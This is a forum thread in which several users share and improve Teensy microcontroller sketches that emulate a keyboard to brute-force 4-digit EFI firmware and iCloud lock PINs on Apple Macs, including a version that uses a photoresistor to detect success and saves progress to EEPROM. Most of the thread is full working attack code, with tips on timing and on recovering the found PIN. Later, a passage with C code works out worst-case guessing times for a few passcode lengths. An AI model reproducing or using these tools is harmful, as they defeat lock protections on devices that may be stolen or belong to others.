Teensy sketch for EFI and Icloud Bruteforce attack


8 years 3 months ago - 8 years 2 months ago #2009 by CygnusX1
Here is the sketch for the Teensy if anyone still uses the "bruteforce" method.
This sketch was created by "Orvtech" so all credit goes to him.

This is the EFI sketch


#include <usb_keyboard.h>
// This code was developed and written by Overtech
// This code is licensed under Apache 2.0 License
// http://www.apache.org/licenses/LICENSE-2.0.txt
// Limitation of Liability. In no event and under no legal theory,
// whether in tort (including negligence), contract, or otherwise,
// unless required by applicable law (such as deliberate and grossly
// negligent acts) or agreed to in writing, shall any Contributor be
// liable to You for damages, including any direct, indirect, special,
// incidental, or consequential damages of any character arising as a
// result of this License or out of the use or inability to use the
// Work (including but not limited to damages for loss of goodwill,
// work stoppage, computer failure or malfunction, or any and all
// other commercial damages or losses), even if such Contributor
// has been advised of the possibility of such damages.
// This code is intended for people who are not able to contact
// apple support and I am in no way liable for any damage or
// problems this code might cause.

const int ledPin = 13; // choose the pin for the LED
int counter = 0;
int fakecounter = counter;
char pin[]="xxxx";

void setup() {
  pinMode(ledPin, OUTPUT); // declare LED as output
  delay(10000);
}

void loop(){
  keyboard_modifier_keys = 0;
  if (counter <= 9999){
    delay(8000);
    digitalWrite(ledPin, LOW);
    delay(5500);
    digitalWrite(ledPin, HIGH);
    sprintf(pin, "%04d", fakecounter);
    //sending first digit
    Keyboard.press(pin[0]);
    delay(450);
    Keyboard.release(pin[0]);
    delay(420);
    //sending second digit
    Keyboard.press(pin[1]);
    delay(398);
    Keyboard.release(pin[1]);
    delay(510);
    //sending third digit
    Keyboard.press(pin[2]);
    delay(421);
    Keyboard.release(pin[2]);
    delay(423);
    //sending fourth digit
    Keyboard.press(pin[3]);
    delay(430);
    Keyboard.release(pin[3]);
    delay(525);
    //sending enter
    Keyboard.press(KEY_ENTER);
    delay(305);
    Keyboard.release(KEY_ENTER);
  }
  //reached 4 digit PIN max value
  if (counter > 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
      digitalWrite(ledPin, HIGH);
      delay(20);
      digitalWrite(ledPin, LOW);
      delay(200);
    }
    delay(6000);
  }
  ++counter;
  fakecounter = counter;
}

This is the Icloud sketch


#include <usb_keyboard.h>
// This code was developed and written by Overtech
// This code is licensed under Apache 2.0 License
// http://www.apache.org/licenses/LICENSE-2.0.txt
// Limitation of Liability. In no event and under no legal theory,
// whether in tort (including negligence), contract, or otherwise,
// unless required by applicable law (such as deliberate and grossly
// negligent acts) or agreed to in writing, shall any Contributor be
// liable to You for damages, including any direct, indirect, special,
// incidental, or consequential damages of any character arising as a
// result of this License or out of the use or inability to use the
// Work (including but not limited to damages for loss of goodwill,
// work stoppage, computer failure or malfunction, or any and all
// other commercial damages or losses), even if such Contributor
// has been advised of the possibility of such damages.
// This code is intended for people who are not able to contact
// apple support and I am in no way liable for any damage or
// problems this code might cause.

const int ledPin = 13;
int counter = 0;

//waits for iCloud
int firstloop = 0;
int secondloop = 0;
int thirdloop = 0;
boolean firstcompleted = false;
boolean secondcompleted = false;
int fakecounter = counter;
char pin[]="xxxx";

void setup() {
  pinMode(ledPin, OUTPUT);
  delay(10000);
  digitalWrite(ledPin, LOW);
}

void loop(){
  keyboard_modifier_keys = 0;
  //lets wait 1minute and 1 second
  if (firstloop >= 5){
    delay(61000);
    firstcompleted = true;
    digitalWrite(ledPin, LOW);
  }
  else if ((firstloop < 5) && (firstcompleted == false)){
    digitalWrite(ledPin, HIGH);
    ++firstloop;
    digitalWrite(ledPin, LOW);
  }
  //lets wait 5 minutes and one second
  if ((secondloop >= 1) && (secondcompleted == false) && (firstcompleted == true)){
    delay(301000);
    secondloop = 0;
    secondcompleted = true;
    digitalWrite(ledPin, LOW);
  }
  else if ((secondloop < 1) && (secondcompleted == false) && (firstcompleted == true)){
    ++secondloop;
    digitalWrite(ledPin, LOW);
  }
  //lets wait 15 minutes and 1 second
  if ((thirdloop >= 1) && (secondcompleted == true)){
    delay(901000);
    thirdloop = 0;
    secondcompleted = false;
    firstcompleted = false;
    firstloop = 0;
    secondloop = 0;
    thirdloop = 0;
    digitalWrite(ledPin, LOW);
  }
  else if ((thirdloop < 1) && (secondcompleted == true)){
    ++thirdloop;
    digitalWrite(ledPin, LOW);
  }
  //lets get to work
  if (counter <= 9999){
    delay(100503);
    digitalWrite(ledPin, LOW);
    delay(7049);
    digitalWrite(ledPin, HIGH);
    sprintf(pin, "%04d", fakecounter);
    Keyboard.press(pin[0]);
    delay(450);
    Keyboard.release(pin[0]);
    delay(420);
    Keyboard.press(pin[1]);
    delay(398);
    Keyboard.release(pin[1]);
    delay(510);
    Keyboard.press(pin[2]);
    delay(421);
    Keyboard.release(pin[2]);
    delay(423);
    Keyboard.press(pin[3]);
    delay(430);
    Keyboard.release(pin[3]);
    delay(525);
    Keyboard.press(KEY_ENTER);
    delay(405);
    Keyboard.release(KEY_ENTER);
    digitalWrite(ledPin, LOW);
  }
  //reached 4 digit PIN max value
  if (counter > 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
      digitalWrite(ledPin, HIGH);
      delay(20);
      digitalWrite(ledPin, LOW);
      delay(200);
    }
    delay(6000);
  }
  ++counter;
  fakecounter = counter;
}

You will need the Teensy loader and the Arduino libraries to load this sketch.

Here is a link to "Github" so any updates will be found here. Also, there is a sketch for just the Icloud 4 digit pin only input.
github.com/orvtech/efi-bruteforce

This may be old school but I still find myself needing it every once in a while.

If I helped you buy me a latte!
Last edit: 8 years 2 months ago by CygnusX1.

8 years 2 months ago #2093 by thaGH05T
OK, I have just started on the Teensy brute force method again. I just feel like being able to brute force EFI or iCloud locks and not knowing what the pass code is unless you video tape the process or run a script that can guess about when it was cracked yadda yadda yadda is sufficient.

Don't get me wrong, OrvTech is a great guy and was a huge motivator in my research back when I met him on HackMac.com. BUT, I think we are at a point where we can expand on this and actually get the code when the EFI lock is bypassed. I have a few ideas on how this can be done so far and am looking for people here to step up and help me get this readily available for anyone searching for this. I mean I have seen a few existing tools out there that are close to $200, but who the hell wants to pay that?? I could send my mac to an overpriced tech and have him solder a whole new EFI chip for that price. So, here are a couple of my ideas:
  1. Use the Teensy with added logic to tell when the EFI pass-code has been bypassed.
  2. Use the RasPi to do the exact same thing in any language you want with added functionality.
  3. You guys can get off your @$$ and find another viable solution!

I have already started looking into the Teensy method and have challenged #fadguru to a race in finding a solution with the RasPi. I have an idea on how to detect the correct code being entered and my next post will start to expand on what I have so far. So ALL OF YOU READING THIS, pitch in and show me what you have to offer to this project!
The following user(s) said Thank You: stankovich

8 years 2 months ago - 8 years 1 month ago #2094 by thaGH05T
OK, my test machine is an A1278 that I have set the EFI lock manually on. The EFI pass-code is set to 0005 and I have booted into recovery mode to do a manual/dry run. I have found that by pressing caps lock on the Mac's native keyboard and then entering a few wrong pass-codes and then entering the correct one (0005), the Mac starts to boot into recovery mode and then unsets the caps lock key. Interesting.... This happens within 5 seconds of entering the correct pass-code in my case. The time between each permutation is roughly 13 seconds and has to be, because of the delay the Mac starts to put in between attempts on the EFI pass-code. That being said, there is enough time to catch that event and display the correct pass-code on a small LCD screen and cease execution or just blink the LED happily until you return to see you have an unlocked Mac in recovery mode.

Now onto my issue; on a Windows machine I am able to set and unset the caps lock on all attached keyboards from the Teensy. I can also do the same with any of the attached keyboards by pressing caps lock. I have the code setup to turn the LED on when the caps lock is turned on. I upload the sketch to my Teensy and am surprised to see on Apple hardware this will not work the same way. The keyboards seem to work independently and nothing notifies other attached devices when the caps lock status changes. I still haven't lost hope yet with this so I am searching for a solution.

My question; is there a way to listen for this particular event on a mac using Arduino libraries? Or, is there a way I can listen for any hardware events with the Teensy period. Another approach would be to detect when the mac searches for attached hardware, such as when you boot to media select mode holding the option key at boot?

Any ideas from my loyal community??? :)
Last edit: 8 years 1 month ago by thaGH05T.
The following user(s) said Thank You: RAILEANU

8 years 1 month ago - 8 years 1 month ago #2479 by thaGH05T
OK, I have decided there is no easy way to do this using the Teensy without the need of at least a voltage divider. The whole idea I had in the beginning was that I wanted to use only a Teensy connected to the Mac via USB. If I continue to pursue a method that will catch the USB event or even detecting voltage changes as the Mac looks for drives I am still going to need hardware. The logic will likely have to change for every Mac too, so I decided to go with two simple components for now:

1 - LDR (Light Detecting Resistor/Photoresistor)
2 - 220 Ohm Resistor

By using these two elements we can detect when the passcode is put in correctly by monitoring the LDR from an analog pin on the Teensy. Basically when you boot the Mac holding command it will allow you to select which media to boot from. We place the photoresistor over the padlock, plug in the Teensy, and let it run. The lock is pretty dark and the photoresistor will read pretty low until you get the right code and the screen changes to the media select in which case the photoresistor will read much higher. When we detect the change we want to do something with it such as sound a buzzer and display it on a 4 digit 7 segment display.

The code below simply blinks the USB when complete the key is found as well as when it has tried all combinations. It defines a few variables at the top that can be changed easily to alter delay times and thresholds. This is a very basic brute force code that will work as is just like Orvtech's code without the need of the resistor or LDR, although it is meant to be a stepping stone to a tool I intend to develop around the Teensy that will allow you to set the values from a display, and display the pin if/when found.

/*******************************************************************************************\
| TITLE: Mac Attack                   DATE: 1/27/2016                                       |
| AUTHOR: John Neal                   ALIAS: thaGH05T                                       |
| ----------------------------------------------------------------------------------------- |
| LICENCE: This work is licensed under the Creative                                         |
| Commons Attribution-ShareAlike 4.0 International License. To view a copy of this license, |
| visit http://creativecommons.org/licenses/by-sa/4.0/.                                     |
| ----------------------------------------------------------------------------------------- |
| DESCRIPTION: This sketch will methodically brute force the EFI passcode of a Mac if it    |
| has been locked down by iCloud and the EFI passcode has not been previously set.          |
| Additionally it is able to detect when the correct code has been entered by using an LDR. |
| ----------------------------------------------------------------------------------------- |
| TO-DO: Add logic for a display and functionality that lets the user determine the         |
| iteration delay, light threshold, brute force digits, and keypress delay. I will likely   |
| add quick attacks such as common passcodes that will include 1950 and ^.                  |
\*******************************************************************************************/

#include <usb_keyboard.h>

const int readPin = A0;         // Analog read pin of the LDR.
const int ledPin = 13;          // Led Pin, 13 on Teensy 3.1.
const char* digits = "%04d";    // sprintf() format, %04d = 4 digits.
int bfDigits = 9999;            // Brute force eventuality, how high to count.
int iterDelay = 14000;          // Iteration delay, adjust as needed.
int lightThresh = 100;          // Threshold of LDR, depends on resistor value.
int count = 0;
char code[5];                   // 4 digits plus the NUL terminator that sprintf() writes.

void setup() {
  keyboard_modifier_keys = 0;
  pinMode(ledPin, OUTPUT);
  delay(5000);
}

void loop(){
  int lightVal = analogRead(readPin);
  //Serial.println(lightVal);           // Print LDR value to serial to manually determine lightThresh.
  if (lightVal < lightThresh){
    if (count <= bfDigits){
      sprintf(code, digits, count);
      for (int i=0; i < 4; i++){
        digitalWrite(ledPin, HIGH);
        Keyboard.press(code[i]);
        delay(200);
        digitalWrite(ledPin, LOW);
        Keyboard.release(code[i]);
        delay(200);
      }
      Keyboard.press(KEY_ENTER);
      delay(200);
      Keyboard.release(KEY_ENTER);
      delay(iterDelay);
      count++;
    }
    else if (count > bfDigits){
      while (1){
        for (int i=0; i < 3; i++){
          digitalWrite(ledPin, HIGH);
          delay(100);
          digitalWrite(ledPin, LOW);
          delay(100);
        }
        delay(500);
      }
    }
  }
  else if (lightVal > lightThresh){
    while (1){
      for (int i=0; i < 3; i++){
        digitalWrite(ledPin, HIGH);
        delay(100);
        digitalWrite(ledPin, LOW);
        delay(100);
      }
      delay(500);
    }
  }
}

I need some feedback now from you all; what kind of features would you want said tool to have at what price range? Because I will likely just make this into a shield for the Teensy 3.x and Teensy LC. Here are some of my ideas:
  • Buzzer
  • LCD
  • 4 digit 7 segment display
  • LCD w/touch
If this really takes off I may make different levels of shields that could range between blinking an LED in binary to sending a text/email to you upon success/failure. The ball is in your court......
Last edit: 8 years 1 month ago by thaGH05T.
The following user(s) said Thank You: RAILEANU

8 years 2 weeks ago #2770 by thaGH05T
Well, nobody has given me any feedback which I find pretty strange since I made huge improvements on the code. Even though nobody is following this yet I have updated the code to do the following:
  • Use 4 digit 7 segment display to show entered key and display saved/found key.
  • Save last entered key into EEPROM in case of power failure and to preserve found key.
  • Improved variable declarations for ease of use and customization.
  • Improved LDR logic for detecting when the correct code is entered.

I will be taking a video for demonstration and instructional use soon...
/*******************************************************************************************\
| TITLE: Mac Attack                   DATE: 1/27/2016                   MODIFIED: 3/13/2016 |
| AUTHOR: John Neal                   ALIAS: thaGH05T                                       |
| ----------------------------------------------------------------------------------------- |
| LICENCE: This work is licensed under the Creative                                         |
| Commons Attribution-ShareAlike 4.0 International License. To view a copy of this license, |
| visit http://creativecommons.org/licenses/by-sa/4.0/.                                     |
| ----------------------------------------------------------------------------------------- |
| DESCRIPTION: This sketch will methodically brute force the EFI passcode of a Mac if it    |
| has been locked down by iCloud and the EFI passcode has not been previously set.          |
| Additionally it is able to detect when the correct code has been entered by using an LDR. |
| ----------------------------------------------------------------------------------------- |
| TO-DO: Add common 4 digit codes as well as birthdate ranges. Add buttons for quick        |
| variable setting. Port over to LCD for usability and versatility of configuration and     |
| attack methods.                                                                           |
\*******************************************************************************************/

/*******************************************************************************************\
| WARNING: This sketch potentially writes 10,000 times to a single address of memory.       |
| Each address can become unreadable after 100,000 writes, so it is recommended that you    |
| change saveAddress before each use.                                                       |
\*******************************************************************************************/

#include <usb_keyboard.h>
#include <SevSeg.h>
#include <EEPROM.h>

const int readPin = A0;                         // Analog read pin of the LDR.
const int ledPin = 13;                          // Led Pin, 13 on Teensy 3.1.
const char* digits = "%04d";                    // sprintf() format, %04d = 4 digits.
int bfDigits = 9999;                            // Brute force eventuality, how high to count.
int iterDelay = 14000;                          // Iteration delay, adjust as needed.
int lightThresh = 100;                          // Threshold of LDR, depends on resistor value.
int saveAddress = 1337;                         // Address where the last entered digit is stored.
byte numDigits = 4;                             // Number of digits your 7 segment display has.
byte digitPins[] = {9, 10, 11, 12};             // Digit pins, has to be in order from first to last digit.
byte segmentPins[] = {1, 2, 3, 4, 5, 6, 7, 8};  // Segment pins, has to be in order from A to G. Last array object should be the "." dot.
char code[5];                                   // Digits in the code plus one byte for the NUL terminator sprintf() writes. (change this to the digit count of bfDigits, plus one)
int setupDelay = 5000;                          // This is the time in milliseconds that the EFI code or last number entered will be displayed as well as how -->
                                                // long the initial countdown to start brute forcing will be.
SevSeg sevseg;                                  //Instantiate a seven segment object.

void setup() {
  sevseg.begin(COMMON_ANODE, numDigits, digitPins, segmentPins);
  sevseg.setBrightness(10);
  keyboard_modifier_keys = 0;
  pinMode(ledPin, OUTPUT);
  //Serial.begin(9600);           // Begin serial if calibrating lightThresh.

  int efiStartTime = millis();
  int efiEndTime = efiStartTime;
  int savedEFI = readWord(saveAddress);
  while ((efiEndTime - efiStartTime) <= setupDelay){
    sevseg.setNumber(savedEFI,5);
    sevseg.refreshDisplay();
    efiEndTime = millis();
  }
}

int bfCount = 0;  //readWord(saveAddress);          // Determines where to start the brute force count. "0" To begin BF, "readWord(saveAddress)" to start from power failure.
int doOnce = 1;

void loop(){
  if (doOnce == 1){
    int startTime = millis();
    int endTime = startTime;
    while ((endTime - startTime) <= setupDelay + 10){
      int delayMath = endTime / 1000 - 10;
      int modDelay = delayMath * -1;
      sevseg.setNumber(modDelay,5);
      sevseg.refreshDisplay();
      endTime = millis();
    }
    doOnce = 0;
  }
  
  int lightVal = analogRead(readPin);
  //Serial.println(lightVal);           // Print LDR value to serial to manually determine lightThresh.
  if (lightVal < lightThresh){
    if (bfCount <= bfDigits){
      sprintf(code, digits, bfCount);
      for (int i=0; i < 4; i++){
        digitalWrite(ledPin, HIGH);
        Keyboard.press(code[i]);
        delay(200);
        digitalWrite(ledPin, LOW);
        Keyboard.release(code[i]);
        delay(200);
      }
      Keyboard.press(KEY_ENTER);
      delay(200);
      Keyboard.release(KEY_ENTER);
      
      int startTime = millis();
      int endTime = startTime;
      while ((endTime - startTime) <= iterDelay){
        sevseg.setNumber(bfCount,5);
        sevseg.refreshDisplay();
        endTime = millis();
      }
      bfCount++;
      writeWord(saveAddress, bfCount);
    }
    else if (bfCount > bfDigits){
      while (1){
        for (int i=0; i < 3; i++){
          digitalWrite(ledPin, HIGH);
          delay(100);
          digitalWrite(ledPin, LOW);
          delay(100);
        }
        delay(500);
      }
    }
  }
  else if (lightVal > lightThresh){
    writeWord(saveAddress, bfCount);
    while (1){
      sevseg.setNumber(bfCount,5);
      sevseg.refreshDisplay();
    }
  }
}

void writeWord(unsigned address, unsigned value){
  EEPROM.write(address, highByte(value));
  EEPROM.write(address+1, lowByte(value));
}

unsigned readWord(unsigned address){
  return word(EEPROM.read(address), EEPROM.read(address+1));
}

For those of you who are thinking this is too good to be true, you're welcome. For those of you who have no idea what to do with this, don't worry the tutorial is coming soon and I will be creating a shield for the Teensy xx :)
The following user(s) said Thank You: CygnusX1

7 years 11 months ago #2905 by CygnusX1
Can you recommend a good display to use with the Teensy?

If I helped you buy me a latte!

7 years 11 months ago #2912 by thaGH05T
Actually the display is universal, I am using one that I cannot even find a datasheet on but probed the pin-out with a multi-meter. You can literally choose any El cheapo you want as long as you can get the datasheet for reference. This really eats up the pins on your Teensy, making it harder to implement more things into the project, but it does the job. The Teensy has so many pins available anyways. I did it this way to be cheap, but I will likely use a display with a driver that uses only a few pins in the future. The problem here is that the brute force method is outdated and lengthy. So I don't think anyone really needs to use this on a Mac anymore. The real opportunity is with brute forcing the iPhone or other devices.
The following user(s) said Thank You: RAILEANU, komaxa

7 years 10 months ago - 7 years 10 months ago #3220 by bestfood
Hi, can you please advise me how to connect to EEPROM and how I could apply this code to your code.
Right now I'm using a Teensy 3.2 with a 16x2 LCD (HD44780)
#include <usb_keyboard.h>
#include <LiquidCrystal.h>
LiquidCrystal lcd(23,22,16,15,14,13);

const int ledPin = 13; // choose the pin for the LED
int counter = 0;  // Start input
int fakecounter = counter;
char pin[]="xxxx";

void setup() {

  lcd.begin(16, 2);
  lcd.print("CODE INPUT");
  pinMode(ledPin, OUTPUT); // declare LED as output
  delay(9000);
}

void loop(){
  keyboard_modifier_keys = 0;
  if (counter <= 9999){
    delay(7300);
    digitalWrite(ledPin, LOW);
    delay(5500);
    digitalWrite(ledPin, HIGH);
    sprintf(pin, "%04d", fakecounter);
    //sending first digit
    Keyboard.press(pin[0]);
    delay(300);
    Keyboard.release(pin[0]);
    delay(300);
    //sending second digit
    Keyboard.press(pin[1]);
    delay(300);
    Keyboard.release(pin[1]);
    delay(300);
    //sending third digit
    Keyboard.press(pin[2]);
    delay(300);
    Keyboard.release(pin[2]);
    delay(300);
    //sending fourth digit
    Keyboard.press(pin[3]);
    delay(300);
    Keyboard.release(pin[3]);
    delay(300);
    //sending enter
    Keyboard.press(KEY_ENTER);
    delay(300);
    Keyboard.release(KEY_ENTER);
    lcd.setCursor(0, 1);
    lcd.print(pin[0]);
    lcd.setCursor(1, 1);
    lcd.print(pin[1]);
    lcd.setCursor(2, 1);
    lcd.print(pin[2]);
    lcd.setCursor(3, 1);
    lcd.print(pin[3]);
      
  }
  
  //reached 4 digit PIN max value
  if (counter > 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
      digitalWrite(ledPin, HIGH);
      delay(20);
      digitalWrite(ledPin, LOW);
      delay(200);
    }
    delay(5300);
  }
  ++counter;
  fakecounter = counter;
}


with this diagram below
Attachments:
Last edit: 7 years 10 months ago by thaGH05T.
The following user(s) said Thank You: RAILEANU

7 years 10 months ago #3223 by thaGH05T
Are you wanting to use the LCD in place of the 4 digit 7 segment display? And are you talking about the EEPROM where the count will be saved?

7 years 10 months ago #3236 by bestfood
Sorry for the late reply, I meant is it possible to show the number from EEPROM on screen so that I can start from that specific number.

Thanks

7 years 10 months ago #3237 by thaGH05T
Yea man, you can absolutely do anything with this code as far as a controlled brute force attack.

7 years 10 months ago #3268 by anthonybrown123
Hi there
I bought a Teensy 3.2 and it's working fine. I put it on for record. I rewound the footage and it unlocked at 10.18.50 sec later. It does 3 codes every 60 secs

But the only thing is I cannot work out the maths to work out the code
1 Hour 3x60= 180

10 Hours = 1800
18 mins = 36
50 Seconds nearly 3/4 codes
Total 1837

I've tried all codes from 1800 to 1900, no luck. What am I doing wrong??? Or am I calculating this up wrong?
Someone please please help me :(

7 years 9 months ago #3271 by CygnusX1
I do 3.45 per min. So I get 207 per hour. So if you are running the same code I am, the pin should be around 2132.
10x60+18x3.45

If I helped you buy me a latte!
The following user(s) said Thank You: anthonybrown123

7 years 9 months ago #3282 by reverendalc
i am very interested in this! i've done a LOT of brute forcing in my day, and i've found a few techniques that aid in the process, but due to how easy EFI flashing got, this process was never really developed.

would you consider sharing specifics (like part numbers and vendors) for those of us who are interested, but lack the technical background?

thanks!

7 years 9 months ago #3283 by muhdhafiz
Hi Guys,

I have tried this Bruteforce attack on my MBP for 2-3 round which takes about a months but still unable to get through the 4digit code to enter recover mode.

My question is, EFI lock for MBP late 2013 Model A1502 ONLY contains 4digit or it can be anything alphabet + numeric + symbol?

Thank You. :)

7 years 9 months ago #3284 by CygnusX1

muhdhafiz wrote: Hi Guys,

I have tried this Bruteforce attack on my MBP for 2-3 round which takes about a months but still unable to get through the 4digit code to enter recover mode.

My question is, EFI lock for MBP late 2013 Model A1502 ONLY contains 4digit or it can be anything alphabet + numeric + symbol?

Thank You. :)


The EFI could be ANYTHING! It could be 12 characters. 4 digit pin number would be if it is iCloud locked.

If I helped you buy me a latte!
The following user(s) said Thank You: muhdhafiz

7 years 9 months ago #3286 by muhdhafiz
Thanks for your reply.

My next question is, If I buy this A1502 EMC2678 chip from ebay which is the same model as mine( www.ebay.com/itm/BIOS-EFI-Firmware-Chip-for-Apple-MacBook-Pro-13-A1502-Late-2013-EMC-2678-/141446028030 ) and straight away take out the old emc chip and replace with the new one. Will it work? or I still need to do some tweak in the bin file.

Thank You. :)

7 years 9 months ago #3288 by CygnusX1

muhdhafiz wrote: Thanks for your reply.

My next question is, If I buy this A1502 EMC2678 chip from ebay which is the same model as mine( www.ebay.com/itm/BIOS-EFI-Firmware-Chip-for-Apple-MacBook-Pro-13-A1502-Late-2013-EMC-2678-/141446028030 ) and straight away take out the old emc chip and replace with the new one. Will it work? or I still need to do some tweak in the bin file.

Thank You. :)


You would need to edit the bin file to reflect your serial number. Then there is the risk of damage to the new chip or the surrounding components. I would HIGHLY recommend letting it just be serviced properly. Money back guarantee too! ghostlyhaks.com/shop/efi-lock-removal-service

If I helped you buy me a latte!

7 years 9 months ago #3307 by thaGH05T
Ok, for anyone reading this.... The EFI passcode can only be brute forced IF:

The passcode was set by iCloud AND was not previously set.
OR it was set by the user as a 4 to 6 digit numerical value (not likely).

I mean, the brute force method theoretically could work in other ways, but not efficiently let's just say that... For instance.. If they had set a 12 digit number only you could modify my above code and it would go through all the eventualities, but it would take forever.
The following user(s) said Thank You: muhdhafiz
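
The feasibility limit described in the post above, worked through as an added example (not code from this thread or from either sketch author): it computes the worst-case time to exhaust a firmware passcode space and the shortest length that pushes that time past a chosen target, which is the number to look at when choosing a firmware password. Assumptions: a fixed 14 s per attempt (the `iterDelay` value in the sketch earlier in the thread), a 94-symbol alphabet for mixed printable ASCII, and hypothetical function names.

```c
#include <stdio.h>

#define SECONDS_PER_DAY  86400.0
#define SECONDS_PER_YEAR (365.25 * SECONDS_PER_DAY)

/* Candidate count for a secret of `length` symbols over `alphabet` symbols.
 * Returned as double: 94^12 is about 4.8e23 and overflows a 64-bit integer. */
double keyspace(unsigned alphabet, unsigned length)
{
    double n = 1.0;
    for (unsigned i = 0; i < length; i++)
        n *= (double)alphabet;
    return n;
}

/* Worst case: every candidate is entered once at a fixed cost per attempt. */
double worst_case_seconds(unsigned alphabet, unsigned length,
                          double secs_per_attempt)
{
    return keyspace(alphabet, length) * secs_per_attempt;
}

/* Shortest length whose worst-case search time reaches target_seconds.
 * Returns 0 when the inputs make the question meaningless. */
unsigned min_length_for(unsigned alphabet, double secs_per_attempt,
                        double target_seconds)
{
    if (alphabet < 2 || secs_per_attempt <= 0.0)
        return 0;
    unsigned length = 1;
    while (worst_case_seconds(alphabet, length, secs_per_attempt) < target_seconds)
        length++;
    return length;
}

int main(void)
{
    /* Assumption: 14 s per attempt, taken from iterDelay in the thread. */
    const double secs = 14.0;
    /* Constructed sample policies; 94 = printable ASCII without the space. */
    const struct { const char *label; unsigned alphabet, length; } policies[] = {
        { "4-digit PIN",         10,  4 },
        { "6-digit PIN",         10,  6 },
        { "12-digit number",     10, 12 },
        { "12-char mixed ASCII", 94, 12 },
    };

    for (size_t i = 0; i < sizeof policies / sizeof policies[0]; i++) {
        double s = worst_case_seconds(policies[i].alphabet,
                                      policies[i].length, secs);
        printf("%-20s %10.3g candidates %12.4g days %12.4g years\n",
               policies[i].label,
               keyspace(policies[i].alphabet, policies[i].length),
               s / SECONDS_PER_DAY, s / SECONDS_PER_YEAR);
    }

    /* Length needed for a 100-year worst case at the same attempt rate. */
    printf("digits only: %u, mixed ASCII: %u\n",
           min_length_for(10, secs, 100.0 * SECONDS_PER_YEAR),
           min_length_for(94, secs, 100.0 * SECONDS_PER_YEAR));
    return 0;
}
```

At this attempt rate a 4-digit code is exhausted in under two days, while a 12-digit number takes on the order of hundreds of thousands of years.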

7 years 9 months ago #3322 by reverendalc
true that. if you run the brute force tool ONCE, and you don't get through... it's time to invest your energy in another method.
